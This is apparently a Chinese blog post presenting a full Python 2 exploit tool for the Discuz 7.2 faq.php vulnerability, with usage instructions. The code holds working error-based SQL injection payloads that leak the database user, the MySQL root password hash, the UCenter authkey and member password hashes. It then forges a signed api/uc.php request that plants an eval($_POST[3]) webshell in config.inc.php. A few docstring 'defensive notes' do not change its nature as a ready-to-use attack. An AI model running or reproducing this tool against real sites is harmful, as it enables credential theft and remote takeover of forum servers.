Python写的Discuz7.2版faq.php注入漏洞工具


Posted in Python on August 06, 2014

Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者)

实现代码:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: gb2312 -*-
# -*- coding: utf_8 -*- 
# author iswin 
import sys
import hashlib
import time
import math
import base64
import urllib2 
import urllib
import re

def sendRequest(url,para):
	"""POST the form fields in ``para`` to ``url`` and return the raw body.

	Every failure (encoding, connection, timeout, HTTP error) is printed to
	stdout as 'Exploit Failed!' followed by the exception text, after which
	the whole process terminates with exit(0); callers never see an
	exception from here.  The read uses a 20 second socket timeout.
	"""
	try:
		encoded = urllib.urlencode(para)
		request = urllib2.Request(url, encoded)
		body = urllib2.urlopen(request, timeout=20).read()
	except Exception, e:
		print 'Exploit Failed!\n%s'%(e)
		exit(0)
	return body

def getTablePrefix(url):
	"""Recover the Discuz table prefix through error-based injection on faq.php.

	The 'gids[100][0]' value is appended to the grouppermission query (it
	opens with ')' and comments out the rest with '#') and provokes a
	duplicate-key error whose message embeds hex(TABLE_NAME) of the first
	table in the current database.  The prefix is the part of that name
	before the first '_'.  Exits the process when no 'Duplicate entry'
	text is present in the response.

	Defensive note: the leak depends on the MySQL error text being echoed
	to the client; the injection itself needs the vendor fix for faq.php.
	"""
	print 'Start GetTablePrefix...'
	# count(*)/floor(rand(0)*2)/group by is the classic duplicate-key trick:
	# the grouped value (here the hex table name + a 0/1 digit) ends up in
	# the error message.
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	# The leaked value sits inside MySQL's "Duplicate entry '...'" message.
	pre=re.findall("Duplicate entry '(.*?)'",res);
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	# Drop the trailing digit contributed by floor(rand(0)*2), then
	# hex-decode (str.decode('hex') is Python 2 only).
	table_pre=pre[0][:len(pre[0])-1].decode('hex')
	# Keep only the text before the first '_' (e.g. 'cdb' from 'cdb_...').
	table_pre=table_pre[0:table_pre.index('_')]
	print 'Table_pre:%s'%(table_pre)
	return table_pre

def getCurrentUser(url):
	"""Return the MySQL account the forum connects with, as reported by user().

	Same duplicate-key error technique as getTablePrefix(), with user() as
	the leaked value.  The caller tests the result with startswith('root@')
	to decide whether mysql.user is worth querying.  Exits the process when
	no 'Duplicate entry' text is found.
	"""
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para)
	pre=re.findall("Duplicate entry '(.*?)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	# Strip the 0/1 digit appended by floor(rand(0)*2); the variable name is
	# inherited from getTablePrefix() but holds the user()@host string here.
	table_pre=pre[0][:len(pre[0])-1]
	print 'Current User:%s'%(table_pre)
	return table_pre

def getUcKey(url):
	"""Leak the UCenter application key (authkey) from cdb_uc_applications.

	Two error-based injections fetch substr(authkey,1,62) and
	substr(authkey,63,2) separately -- presumably because the duplicate-entry
	message carries only a limited number of characters; confirm.  The table
	name is hard-coded with the default 'cdb_' prefix rather than the value
	from getTablePrefix().  Returns '' when the first lookup yields no
	'Duplicate entry'; the caller expects a 64-character key.

	Defensive note: this key is what get_shell() later uses to sign its
	request, so a forum reachable through this path should treat the key as
	exposed and change it once patched.
	"""
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	res1=sendRequest(url,para1);
	key1=re.findall("Duplicate entry '(.*?)'",res)
	key2=re.findall("Duplicate entry '(.*?)'",res1)
	if len(key1)==0:
		print 'Get Uc_Key Failed!'
		return ''
	# Each half carries a trailing 0/1 digit from floor(rand(0)*2); drop it
	# before joining.  Only key1 is checked for emptiness above.
	key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
	print 'uc_key:%s'%(key)
	return key

def getRootUser(url):
	"""Print the first user/password-hash row of mysql.user.

	Only called by the entry point when user() starts with 'root@', since
	reading mysql.user presumably needs that privilege.  The leaked value is
	'user password' joined by 0x20 (a space); prints it and returns None.
	Exits the process when no 'Duplicate entry' text is found.
	"""
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
	res=sendRequest(url,para);
	pre=re.findall("Duplicate entry '(.*?)'",res)
	if len(pre)==0:
		print 'Exploit Failed!'
		exit(0);
	# Strip the floor(rand(0)*2) digit, then split on the 0x20 separator.
	table_pre=pre[0][:len(pre[0])-1].split(' ')
	print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])

def dumpData(url,table_prefix,count):
	"""Print the username and password hash of one row of <prefix>_members.

	``table_prefix`` comes from getTablePrefix(); ``count`` is the row
	offset used in 'limit %d,1'.  The value is leaked as 'username password'
	joined by 0x20 (a space).  Prints the pair and returns None; exits the
	process when no 'Duplicate entry' text is found.
	"""
	para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}
	res=sendRequest(url,para);
	datas=re.findall("Duplicate entry '(.*?)'",res)
	if len(datas)==0:
		print 'Exploit Failed!'
		exit(0)
	# Strip the floor(rand(0)*2) digit, then split on the 0x20 separator.
	cleandata=datas[0][:len(datas[0])-1]
	info=cleandata.split(' ')
	print 'user:%s pass:%s'%(info[0],info[1])

def microtime(get_as_float = False) :
  """Mimic PHP's microtime().

  With ``get_as_float`` true, return time.time() unchanged.  Otherwise
  return the PHP-style string 'FRACTION SECONDS', the fraction printed with
  eight decimals and the whole seconds as an integer.
  """
  now = time.time()
  if not get_as_float:
    fraction, whole = math.modf(now)
    return '%.8f %d' % (fraction, whole)
  return now
 
def get_authcode(string, key = ''):
  """Encode ``string`` with the Discuz/UCenter authcode scheme under ``key``.

  Python port of the PHP authcode() encode path: keya/keyb are derived from
  md5(key), a 4-char salt keyc is taken from the current microtime, a
  10-char field plus 16 hex chars of md5(string+keyb) are prepended to the
  payload, and the whole thing is RC4-encrypted with keya+md5(keya+keyc).
  Returns keyc followed by the base64 text with '=' padding removed.
  Output differs between calls because keyc is time-derived.
  Python 2 only: hashes str objects directly and mutates a range() list.
  """
  ckey_length = 4
  # Key material: keya feeds the RC4 key, keyb the integrity hash.
  key = hashlib.md5(key).hexdigest()
  keya = hashlib.md5(key[0:16]).hexdigest()
  keyb = hashlib.md5(key[16:32]).hexdigest()
  # keyc is a per-call salt; it is returned in clear as the prefix of the
  # result, presumably so the receiver can rebuild cryptkey.
  keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
  cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 
  key_length = len(cryptkey)
  # '0000000000' presumably is the authcode expiry field (all zeros = no
  # expiry) -- confirm against the PHP original.  The next 16 hex chars of
  # md5(string+keyb) act as an integrity check ahead of the payload.
  string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
  string_length = len(string)
  result = ''
  # RC4 key scheduling: box is the 256-entry permutation (a mutable list
  # under Python 2's range()), rndkey is cryptkey repeated to 256 bytes.
  box = range(0, 256)
  rndkey = dict()
  for i in range(0,256):
    rndkey[i] = ord(cryptkey[i % key_length])
  j=0
  for i in range(0,256):
    j = (j + box[i] + rndkey[i]) % 256
    tmp = box[i]
    box[i] = box[j]
    box[j] = tmp
  # RC4 keystream generation, XORed byte by byte into the padded string.
  a=0
  j=0
  for i in range(0,string_length):
    a = (a + 1) % 256
    j = (j + box[a]) % 256
    tmp = box[a]
    box[a] = box[j]
    box[j] = tmp
    result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
  # Clear-text keyc prefix + base64 body without '=' padding.
  return keyc + base64.b64encode(result).replace('=', '')
 
def get_shell(url,key,host):
  """Send two authcode-signed 'updateapps' requests to api/uc.php.

  ``url`` is the api/uc.php endpoint, ``key`` the leaked UCenter authkey,
  ``host`` the forum base URL.  The first XML body carries a UC_API value
  that closes the PHP string and injects an eval() of $_POST[3]; the second
  resets UC_API to a plain value.  Afterwards the function fetches
  host/config.inc.php once and prints the webshell location on success.
  Returns a short status string on request failure, None otherwise.

  Defensive note: the only thing that makes these requests acceptable to
  api/uc.php is the signed 'code' parameter, which can be produced solely
  with the application key.  After patching, that key should be treated as
  compromised, and config.inc.php reviewed for unexpected content.
  """
  headers={'Accept-Language':'zh-cn',
  'Content-Type':'application/x-www-form-urlencoded',
  'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
  'Referer':url
  }
  # Timestamp 10 hours ahead, signed with the leaked key via authcode.
  tm = time.time()+10*3600
  tm="time=%d&action=updateapps" %tm
  code = urllib.quote(get_authcode(tm,key))
  url=url+"?code="+code
  data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
      <root>
      <item id="UC_API">http://xxx\');eval($_POST[3]);//</item>
      </root>'''
  # Bare except: any failure is reported only through the return value;
  # the response object ``ret`` is never inspected.
  try:
    req=urllib2.Request(url,data=data1,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "Exploit Falied"
  data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
      <root>
      <item id="UC_API">http://aaa</item>
      </root>'''
  try:
    req=urllib2.Request(url,data=data2,headers=headers)
    ret=urllib2.urlopen(req)
  except:
    return "error"

  # Success is judged only by config.inc.php being fetchable; the body is
  # read but not checked.
  try:
  	req=urllib2.Request(host+'/config.inc.php')
  	res=urllib2.urlopen(req,timeout=20).read()
  except Exception, e:
  	print 'GetWebshell Failed,%s'%(e)
   	return
  print "webshell:"+host+"/config.inc.php,password:3"

if __name__ == '__main__':
	# Entry point.  argv[1] is the forum base URL, argv[2] the number of
	# member rows to dump.  Order of operations: current DB user ->
	# mysql.user row (root only) -> uc_key -> webshell attempt -> table
	# prefix -> member dump.  Every helper exits the process on failure.
	print 'DZ7.x Exp Code By iswin'
	if len(sys.argv)<3:
		print 'DZ7.x Exp Code By iswin\nusage:python dz7.py https://3water.com 10'
		exit(0)
	url=sys.argv[1]+'/faq.php'
	count=int(sys.argv[2])
	user=getCurrentUser(url)
	# mysql.user is queried only when the forum connects as root.
	if user.startswith('root@'):
		getRootUser(url)
	uc_key=getUcKey(url)
	# A full 64-char key is needed for the api/uc.php request forgery.
	if len(uc_key)==64:
		print 'Start GetWebshell...'
		get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
	tb_pre=getTablePrefix(url)
	print 'Start DumpData...'
	# One request per member row, offsets 0..count-1.
	for x in xrange(0,count):
		dumpData(url,tb_pre,x)